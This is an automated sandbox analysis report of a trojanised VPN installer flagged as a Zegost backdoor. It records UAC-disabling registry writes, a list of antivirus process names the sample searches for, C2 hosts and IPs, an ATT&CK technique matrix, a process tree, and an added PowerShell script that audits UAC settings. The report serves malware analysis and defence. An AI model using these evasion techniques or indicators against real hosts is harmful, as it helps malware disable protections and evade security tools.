                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668854D20 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00007FF668854D20
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeCode function: 2_2_00000001800347B0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00000001800347B0
                              Source: C:\Users\user\Desktop\Lets-x64.exeCode function: 0_2_00007FF668854260 HeapCreate,GetVersion,HeapSetInformation,0_2_00007FF668854260

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\ProgramData\Program\iusb3mon.exe | Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ConsentPromptBehaviorAdmin EnableLUA PromptOnSecureDesktop | 28_2_06241B6D
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Registry value created: PromptOnSecureDesktop 0
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: avcenter.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: kxetray.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: avp.exe
Source: irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: msmpeng.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: rtvscan.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: 360tray.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: ashDisp.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: 360Tray.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: AYAgent.aye
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: QUHLPSVC.EXE
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: RavMonD.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Mcshield.exe
Source: iusb3mon.exe, iusb3mon.exe, 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: K7TSecurity.exe
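The registry rows in this section are the sample's UAC tampering: the report shows _P18sPbB.exe writing PromptOnSecureDesktop = 0 and creating EnableLUA under Policies\System, and iusb3mon.exe carrying a RegSetValue routine that names ConsentPromptBehaviorAdmin, EnableLUA and PromptOnSecureDesktop. Those three values decide whether UAC is on at all (EnableLUA, effective after the next reboot), whether administrators elevate without any prompt (ConsentPromptBehaviorAdmin = 0) and whether the prompt is isolated on the secure desktop (PromptOnSecureDesktop). The audit below is an added example, not code from the Joe Sandbox report or from the sample; it reads the same key on a live host and flags any value weaker than the Windows client default. The thresholds, the function name and the wording of the findings are this example's own.

```powershell
# Added example: audit the UAC policy values that the report shows _P18sPbB.exe and
# iusb3mon.exe modifying. Thresholds are Windows client defaults, not taken from the sample.

$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# One check per value: Ok returns $true when the value is at least as strict as the default.
$Checks = @(
    @{ Name = 'EnableLUA';                  Ok = { param($v) $v -eq 1 }
       Why  = '0 turns UAC off completely after the next reboot' }
    @{ Name = 'ConsentPromptBehaviorAdmin'; Ok = { param($v) $v -ne 0 }
       Why  = '0 elevates administrators silently; the default is 5 (prompt for non-Windows binaries)' }
    @{ Name = 'PromptOnSecureDesktop';      Ok = { param($v) $v -eq 1 }
       Why  = '0 shows the consent prompt on the normal desktop, where another process can overlay or spoof it' }
)

function Test-UacPolicy {
    param([string]$Path = $PolicyKey)
    $props = Get-ItemProperty -Path $Path -ErrorAction Stop
    foreach ($c in $Checks) {
        $value = $props.($c.Name)                # $null when the value does not exist
        [pscustomobject]@{
            Value    = $c.Name
            Actual   = $value
            # An absent value means the Windows default applies, so only a present weak value is flagged.
            Weakened = ($null -ne $value) -and -not (& $c.Ok $value)
            Why      = $c.Why
        }
    }
}

$findings = Test-UacPolicy
$findings | Format-Table Value, Actual, Weakened -AutoSize
$findings | Where-Object Weakened | ForEach-Object {
    Write-Warning ('{0} = {1}: {2}' -f $_.Value, $_.Actual, $_.Why)
}
```

On the host this report describes the output would show PromptOnSecureDesktop = 0 as weakened, and EnableLUA too if the dropper wrote 0 into it. A finding here is a containment trigger, not something to repair in place: the same process that wrote these values also dropped iusb3mon.exe and scheduled it, so restore the policy only after the host has been isolated and the persistence removed.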

Stealing of Sensitive Information

Source: Yara match | File source: Lets-x64.exe, type: SAMPLE
Source: Yara match | File source: 28.2.iusb3mon.exe.6240000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.4d105bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6640607.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6640607.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.4d105bf.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6240000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: iusb3mon.exe PID: 7272, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Source: Yara match | File source: Lets-x64.exe, type: SAMPLE
Source: Yara match | File source: 28.2.iusb3mon.exe.6240000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.4d105bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6640607.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6640607.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.4d105bf.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6240000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: Lets-x64.exe, type: SAMPLE
Source: Yara match | File source: 28.2.iusb3mon.exe.6240000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.4d105bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6640607.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6640607.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.4d105bf.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6240000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: iusb3mon.exe PID: 7272, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Source: Yara match | File source: Lets-x64.exe, type: SAMPLE
Source: Yara match | File source: 28.2.iusb3mon.exe.6240000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.4d105bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6640607.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6640607.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.4d105bf.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.iusb3mon.exe.6240000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED
MITRE ATT&CK Matrix

The matrix was flattened by extraction and is rebuilt here per tactic. The number before each technique is the badge the report attaches to it in the matrix cell; template cells that carry no badge (including the Linux and macOS entries such as Cron, Launchd and Systemd Timers) are not listed.

Reconnaissance: none
Resource Development: none
Initial Access: 1 Valid Accounts
Execution: 1 Windows Management Instrumentation; 2 Native API; 12 Command and Scripting Interpreter; 11 Scheduled Task/Job; 2 Service Execution; 2 PowerShell
Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 4 Windows Service; 11 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Valid Accounts; 1 Access Token Manipulation; 4 Windows Service; 21 Process Injection; 11 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder
Defense Evasion: 2 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control; 13 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 241 Virtualization/Sandbox Evasion; 21 Process Injection; 1 Rundll32; 1 Indicator Removal
Credential Access: 121 Input Capture
Discovery: 2 System Time Discovery; 4 File and Directory Discovery; 37 System Information Discovery; 251 Security Software Discovery; 241 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 2 System Owner/User Discovery
Lateral Movement: none
Collection: 1 Archive Collected Data; 121 Input Capture
Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 3 Application Layer Protocol
Exfiltration: none
Impact: 1 System Shutdown/Reboot
Behavior Graph

Behavior Graph ID: 1582022 | Sample: Lets-x64.exe | Startdate: 29/12/2024 | Architecture: WINDOWS | Score: 100

The graph export was flattened into one line by extraction; it is rebuilt below as a process tree. Numbers in parentheses are the graph's own node ids, and the bare numbers after a process name are the created-file / registry-value counters shown on that node.

Start (2)
  DNS/IP: ooddoo.top (119)
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 10 other signatures
  Started: Lets-x64.exe 4 (11); iusb3mon.exe (14); svchost.exe (17); rundll32.exe (20)

Lets-x64.exe (11)
  Dropped: C:\Users\user\AppData\Local\...\lua5.1.dll, PE32+ (113); C:\Users\user\AppData\Local\...\irsetup.exe, PE32+ (115)
  Started: irsetup.exe 3 17 (22)

iusb3mon.exe (14)
  Signatures: Antivirus detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Suspicious powershell command line found; 8 other signatures
  Started: powershell.exe (27); cmd.exe (29); cmd.exe (31); 21 other processes (33)

svchost.exe (17)
  DNS/IP: 127.0.0.1 unknown unknown (117)

irsetup.exe (22)
  DNS/IP: ooddoo.top 104.21.81.224, 443, 49717, 49720, CLOUDFLARENETUS, United States (123)
  Dropped: C:\Users\Public\Documents\...\_P18sPbB.exe, PE32 (107); C:\ProgramData\Microsoft\Program\ziliao.jpg, DOS (109); C:\Program Files\...\letsvpn-latest.exe, PE32 (111)
  Signatures: Suspicious powershell command line found; Encrypted powershell cmdline option found
  Started: cmd.exe (35); powershell.exe 11 (37); powershell.exe 11 (39); 32 other processes (45)

powershell.exe (27)
  Started: conhost.exe (41); SecEdit.exe (43)
cmd.exe (29)
  Started: 2 other processes (47)
cmd.exe (31)
  Started: 2 other processes (49)
21 other processes (33)
  Started: 36 other processes (51)

cmd.exe (35)
  Started: _P18sPbB.exe (53); conhost.exe (58)
powershell.exe (37)
  Started: conhost.exe (60)
powershell.exe (39)
  Started: conhost.exe (62)
conhost.exe (41)
  Started: conhost.exe (64)
32 other processes (45)
  Started: conhost.exe (66); 28 other processes (72)
2 other processes (47)
  Started: conhost.exe (68)
2 other processes (49)
  Started: conhost.exe (70)

_P18sPbB.exe (53)
  DNS/IP: 202.79.169.178, 25445, 49741, BCPL-SGBGPNETGlobalASNSG, Singapore (121)
  Dropped: C:\ProgramData\mntemp, DOS (101); C:\ProgramData\Program\iusb3mon.exe, PE32 (103); C:\ProgramData\...\MicrosoftNetFramework.xml, XML (105)
  Signatures: Antivirus detection for dropped file; Suspicious powershell command line found; Query firmware table information (likely to detect VMs); 6 other signatures
  Started: powershell.exe (74); cmd.exe (77); powershell.exe (79); 3 other processes (81)

powershell.exe (74)
  Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
  Started: conhost.exe (83); SecEdit.exe (85)
cmd.exe (77)
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
  Started: conhost.exe (87)
powershell.exe (79)
  Started: conhost.exe (89); SecEdit.exe (91)
3 other processes (81)
  Started: conhost.exe (93); conhost.exe (95); SecEdit.exe (97); 3 other processes (99)

Source | Detection | Scanner | Label | Link
Lets-x64.exe | 13% | ReversingLabs | Win32.Backdoor.Zegost |
Lets-x64.exe | 13% | Virustotal | | Browse
Lets-x64.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\Program\iusb3mon.exe | 100% | Avira | TR/Crypt.XPACK.Gen2 |
C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | 100% | Avira | TR/Crypt.XPACK.Gen2 |
C:\ProgramData\Program\iusb3mon.exe | 100% | Joe Sandbox ML | |
C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | 100% | Joe Sandbox ML | |
C:\Program Files\product1\letsvpn-latest.exe | 3% | ReversingLabs | |
C:\ProgramData\Microsoft\Program\ziliao.jpg | 17% | ReversingLabs | Win32.Dropper.Generic |
C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll | 0% | ReversingLabs | |
                              No Antivirus matches
